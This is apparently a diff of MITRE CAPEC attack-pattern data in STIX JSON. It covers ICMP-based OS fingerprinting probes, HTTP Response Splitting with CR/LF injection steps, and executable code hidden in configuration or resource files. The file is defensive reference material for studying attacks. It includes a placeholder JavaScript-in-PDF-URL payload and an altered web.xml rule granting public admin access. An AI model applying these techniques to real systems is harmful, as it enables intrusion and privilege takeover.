"source_ref": "course-of-action--43085d5c-cd1e-4175-9d44-f28f8f3cc5f9", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bf4c2215-7fc8-46bd-9caf-9f6fc4c1c877", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--50ea55ae-d8a8-4279-9dc9-05b6fb416b84", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d07b5f41-bbd9-40f6-bd22-173bd6398815", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2e15722-f07d-44db-b988-af501e0f1e13", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the integrity of data returned or \"Quoted\" from the originating request that generated the error message.", + "external_references": [ + { + "external_id": "CAPEC-330", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/330.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": 
"http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-123", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc792.html" + }, + { + "description": "R. Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "external_id": "REF-124", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc1122.html" + }, + { + "description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group", + "external_id": "REF-262", + "source_name": "reference_from_CAPEC", + "url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf" + } + ], + "id": "attack-pattern--420d73c3-133c-487e-a98a-6050e7680243", + "modified": "2022-02-22T00:00:00.000Z", + "name": "ICMP Error Message Echoing Integrity Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n A tremendous amount of information about the host operating system can be deduced from its 'echoing' characteristics. 
Notably, inspection of key protocol header fields, including the echoed header fields of the encapsulating protocol can yield a wealth of data about the host operating system or firmware version.\n For this purpose \"Port Unreachable\" error messages are often used, as generating them requires the adversary to send a UDP datagram to a closed port on the target. When replying with an ICMP error message some IP/ICMP stack implementations change aspects of the IP header, change or reverse certain byte orders, reset certain field values to default values which differ between operating system and firmware implementations, and make other changes. Some IP/ICMP stacks are decidedly broken, indicating an idiosyncratic behavior that differs from the RFC specifications, such as the case when miscalculations affect a field value.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary sends a UDP packet to a closed port on the target machine to solicit an IP Header's total length field value within the echoed 'Port Unreachable\" error message. 
This type of behavior is useful for building a signature-base of operating system responses, particularly when error messages contain other types of information that is useful identifying specific operating system responses.", + "external_references": [ + { + "external_id": "CAPEC-331", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/331.html" + }, + { + "external_id": "CWE-204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/204.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-123", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc792.html" + }, + { + "description": "R. 
Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "external_id": "REF-124", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc1122.html" + }, + { + "description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group", + "external_id": "REF-262", + "source_name": "reference_from_CAPEC", + "url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf" + } + ], + "id": "attack-pattern--d9629af2-d5c2-4198-b80f-281cc7d04422", + "modified": "2023-01-24T00:00:00.000Z", + "name": "ICMP IP Total Length Field Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n RFC1122 specifies that the Header of the request must be echoed back when an error is sent in response, but some operating systems and firmware alter the integrity of the original header. Non-standard ICMP/IP implementations result in response that are useful for individuating remote operating system or router firmware versions. 
There are four general response types that can be used to distinguish operating systems apart: 1) the IP total length field may be calculated correctly, 2) an operating system may add 20 or more additional bytes to the length calculation, 3) the operating system may subtract 20 or more bytes from the correct length of the field or 4) the IP total length field is calculated with any other incorrect value.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications. Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.\"" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary sends a UDP datagram having an assigned value to its internet identification field (ID) to a closed port on a target to observe the manner in which this bit is echoed back in the ICMP error message. This allows the attacker to construct a fingerprint of specific OS behaviors.", + "external_references": [ + { + "external_id": "CAPEC-332", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/332.html" + }, + { + "external_id": "CWE-204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/204.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "J. 
Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-123", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc792.html" + }, + { + "description": "R. Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "external_id": "REF-124", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc1122.html" + }, + { + "description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group", + "external_id": "REF-262", + "source_name": "reference_from_CAPEC", + "url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf" + } + ], + "id": "attack-pattern--e02f436a-486e-409a-adc6-a058c531f05f", + "modified": "2023-01-24T00:00:00.000Z", + "name": "ICMP IP 'ID' Field Error Message Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n The internet identification field (ID) is typically utilized for reassembling a fragmented packet. RFC791 and RFC815 discusses about IP datagrams, fragmentation and reassembly. Some operating systems or router firmware reverse the bit order of the ID field when echoing the IP Header portion of the original datagram within the ICMP error message. 
There are three behaviors related to the IP ID field that can be used to distinguish remote operating systems or firmware: 1) it is echoed back identically to the bit order of the ID field in the original IP header, 2) it is echoed back, but the byte order has been reversed, or it contains an incorrect or unexpected value. Different operating systems will respond by setting the IP ID field differently within error messaging.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications. Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.\"" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary manipulates and injects malicious content, in the form of secret unauthorized HTTP responses, into a single HTTP response from a vulnerable or compromised back-end HTTP agent (e.g., web server) or into an already spoofed HTTP response from an adversary controlled domain/site.\n See CanPrecede relationships for possible consequences.\n ", + "external_references": [ + { + "external_id": "CAPEC-34", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/34.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-113", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/113.html" + }, + { + "external_id": "CWE-138", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/138.html" + }, + { + "external_id": 
"CWE-436", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/436.html" + }, + { + "description": "HTTP Response Splitting", + "external_id": "25", + "source_name": "WASC", + "url": "http://projects.webappsec.org/HTTP-Response-Splitting" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "HTTP Response Smuggling, Beyond Security", + "external_id": "REF-117", + "source_name": "reference_from_CAPEC", + "url": "http://www.securiteam.com/securityreviews/5CP0L0AHPC.html" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-617", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.html" + }, + { + "description": "Robert Auger, HTTP Response Splitting, 2010, The Web Application Security Consortium", + "external_id": "REF-680", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246931/HTTP%20Response%20Splitting" + } + ], + "id": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "modified": "2022-09-29T00:00:00.000Z", + "name": "HTTP Response Splitting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a", + "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb", + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b", + "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84" + ], + 
"x_capec_child_of_refs": [ + "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Execute Unauthorized Commands", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n In the PHP 5 session extension mechanism, a user-supplied session ID is sent back to the user within the Set-Cookie HTTP header. Since the contents of the user-supplied session ID are not validated, it is possible to inject arbitrary HTTP headers into the response body. This immediately enables HTTP Response Splitting by simply terminating the HTTP response header from within the session ID used in the Set-Cookie directive. See also: CVE-2006-0207\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey network to identify target: The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets

  2. Techniques
    Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer.

Experiment

  1. Identify vulnerabilities in targeted HTTP infrastructure and technologies: The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, HTTP headers, syntax checking and input filtering.

  2. Cause differential HTTP responses by experimenting with identified HTTP Request vulnerabilities: The adversary sends maliciously crafted HTTP request to back-end HTTP infrastructure to inject adversary data (in the form of HTTP headers with custom strings and embedded web scripts and objects) into HTTP responses (intended for intermediary and/or front-end client/victim HTTP agents communicating with back-end HTTP infrastructure) for the purpose of interfering with the parsing of HTTP responses by intermediary and front-end client/victim HTTP agents. The intended consequences of the malicious HTTP request and the subsequent adversary injection and manipulation of HTTP responses to intermediary and front-end client/victim HTTP agents, will be observed to confirm applicability of identified vulnerabilities in the adversary's plan of attack.

  3. Techniques
    Continue the monitoring of HTTP traffic.
    \n Utilize different sequences of special characters (CR - Carriage Return, LF - Line Feed, HT - Horizontal Tab, SP - Space and etc.) to bypass filtering and back-end encoding and to embed:\n \n additional HTTP Requests with their own headers\n malicious web scripts into parameters of HTTP Request headers (e.g., browser cookies like Set-Cookie or Ajax web/browser object parameters like XMLHttpRequest)\n adversary chosen encoding (e.g., UTF-7)\n \n to utilize additional special characters (e.g., > and <) filtered by the target HTTP agent.\n Note that certain special characters and character encoding may be applicable only to intermediary and front-end agents with rare configurations or that are not RFC compliant.\n
    Follow an unrecognized (sometimes a RFC compliant) HTTP header with a subsequent HTTP request to potentially cause the HTTP request to be ignored and interpreted as part of the preceding HTTP request.

Exploit

  1. Perform HTTP Response Splitting attack: Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.

  2. Techniques
    Leverage techniques identified in the Experiment Phase.
", + "x_capec_extended_description": "\n Malicious user input is injected into various standard and/or user defined HTTP headers within a HTTP Response through use of Carriage Return (CR), Line Feed (LF), Horizontal Tab (HT), Space (SP) characters as well as other valid/RFC compliant special characters, and unique character encoding.\n A single HTTP response ends up being split as two or more HTTP responses by the targeted client HTTP agent parsing the original maliciously manipulated HTTP response. This allows malicious HTTP responses to bypass security controls in order to implement malicious actions and provide malicious content that allows access to sensitive data and to compromise applications and users. This is performed by the abuse of interpretation and parsing discrepancies in different intermediary HTTP agents (load balancer, reverse proxy, web caching proxies, application firewalls, etc.) or client HTTP agents (e.g., web browser) in the path of the malicious HTTP responses.\n This attack is usually the result of the usage of outdated or incompatible HTTP protocol versions as well as lack of syntax checking and filtering of user input in the HTTP agents receiving HTTP messages in the path.\n This differs from CAPEC-105 HTTP Request Splitting, which is usually an attempt to compromise a back-end HTTP agent via HTTP Request messages. HTTP Response Splitting is an attempt to compromise aclient agent (e.g., web browser)by sending malicious content in HTTP responses from back-end HTTP infrastructure.\n HTTP Smuggling (CAPEC-33 and CAPEC-273) is different from HTTP Splitting due to the fact it relies upon discrepancies in the interpretation of various HTTP Headers and message sizes and not solely user input of special characters and character encoding. 
HTTP Smuggling was established to circumvent mitigations against HTTP Request Splitting techniques.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_peer_of_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e" + ], + "x_capec_prerequisites": [ + "A vulnerable or compromised server or domain/site capable of allowing adversary to insert/inject malicious content that will appear in the server's response to target HTTP agents (e.g., proxies and users' web browsers).", + "Differences in the way the two HTTP agents parse and interpret HTTP requests and its headers.", + "HTTP headers capable of being user-manipulated.", + "HTTP agents running on HTTP/1.0 or HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses." + ], + "x_capec_resources_required": [ + "Tools capable of monitoring HTTP messages, and crafting malicious HTTP messages and/or injecting malicious content into HTTP messages." + ], + "x_capec_skills_required": { + "Medium": "Possess knowledge on the exact details in the discrepancies between several targeted HTTP agents in path of an HTTP message in parsing its message structure and individual headers." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d1e771e5-938f-4d0e-932e-1692f77db9a1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94b24ec6-eaed-40ba-aa65-789101ea9a55", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3673e571-3d09-4ddf-9967-8a14983e4523", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64555d1a-a57e-49d9-b9f8-02c843ba1af5", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0622cdd8-6ce2-45fc-bfcc-19d3b91d4536", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--38c9102d-b93d-4484-8efb-aa67b53572c8", + "modified": "2022-09-29T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--65a59d08-b52c-4c78-b802-6e65c65f02e5", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c7c66359-57b8-4f29-8d2b-5d5ef075f5f5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--948de9b9-7ad6-4bf5-8daf-f2208db360d6", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e76fd999-0f43-460b-95fb-cb047a2a7f4d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4bd16590-2382-4a10-9712-f28b7bf84fec", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--23a58aa1-dfcb-4295-a673-b44c0cba6264", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5cc83b32-2b3e-41e5-94e8-2e2ea48bf660", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + 
"created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eed85688-d26a-4cec-8582-4ad1e158cdb3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--43085d5c-cd1e-4175-9d44-f28f8f3cc5f9", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d4993c4a-c91f-4a57-9f21-3fe59ccbe5c4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--50ea55ae-d8a8-4279-9dc9-05b6fb416b84", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d73cbb1d-c8db-4b8e-8ae6-32f0d436b1d5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2e15722-f07d-44db-b988-af501e0f1e13", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits a system's trust in configuration and resource files. 
When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.", + "external_references": [ + { + "external_id": "CAPEC-35", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/35.html" + }, + { + "external_id": "CWE-94", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/94.html" + }, + { + "external_id": "CWE-96", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-95", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/95.html" + }, + { + "external_id": "CWE-97", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/97.html" + }, + { + "external_id": "CWE-272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/272.html" + }, + { + "external_id": "CWE-59", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/59.html" + }, + { + "external_id": "CWE-282", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/282.html" + }, + { + "external_id": "CWE-270", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/270.html" + }, + { + "description": "Obfuscated Files or Information: HTML Smuggling", + "external_id": "T1027.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/006" + }, + { + "description": "Obfuscated Files or Information: Embedded Payloads", + "external_id": "T1027.009", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/009" + }, + { + "description": "Hide Artifacts: Resource Forking", + "external_id": 
"T1564.009", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1564/009" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Leverage Executable Code in Non-Executable Files", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7f2c0e10-0afe-4edf-bb23-43d6f29ec932" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Virtually any system that relies on configuration files for runtime behavior is open to this attack vector. The configuration files are frequently stored in predictable locations, so an attacker that can fingerprint a server process such as a web server or database server can quickly identify the likely locale where the configuration is stored. And this is of course not limited to server processes. Unix shells rely on profile files to store environment variables, search paths for programs and so on. 
If the aliases are changed, then a standard Unix \"cp\" command can be rerouted to \"rm\" or other standard command so the user's intention is subverted.", + "The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser.", + "\n Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/)\n http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here\n The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process.\n ", + "\n The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name \"public\" grants all users with the public role the ability to use the administration functionality.\n < security-constraint>Security processing rules for admin screens/admin/*POSTGETadministratorpublic\n \n \n \n The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_peer_of_refs": [ + "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb" + ], + "x_capec_prerequisites": [ + "The attacker must have the ability to modify non-executable files consumed by the target software." + ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server that publishes an over-privileged directory, program, or interface. 
